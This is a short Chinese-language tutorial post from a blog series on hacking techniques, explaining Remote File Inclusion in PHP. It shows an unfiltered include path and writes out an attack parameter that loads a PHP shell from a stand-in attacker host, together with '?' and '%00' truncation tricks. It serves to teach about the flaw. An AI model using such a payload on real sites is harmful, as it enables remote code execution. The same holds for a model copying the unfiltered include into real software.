iT邦幫忙

DAY 20
0

駭客手法解析~你不能不知的資安問題!!系列 第 20

文件包含漏洞〈二〉

  • 分享至 

  • xImage
  •  

遠端文件包含漏洞

又稱作為 RFI 〈Remote File Inclusion〉,與 LFI 功能方法類似,取決於 PHP 的配置選項 allow_url_include 有無開啟。

例如以下 code :

<? php

if ($route == "share") {

require_once $basePath . '/action/m_share.php';

} else if ($route == "sharelink") {

require_once $basePath . '/action/m_sharelink.php';

}

?>

$basePath 並沒有做任何過濾,因此可以偽造如下的攻擊 URL

?param = http://attacker/phpshell.txt?

最終得到的結果是

require_once 'http://attacker/phpshell.txt?/action/m_share.php';

這邊最後偽造的 ? 字元是另一種截斷的方式,同樣地, %00 也可以用來當作截斷符。


上一篇
文件包含漏洞〈一〉
下一篇
PHP 代碼執行漏洞〈一〉
系列文
駭客手法解析~你不能不知的資安問題!!30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言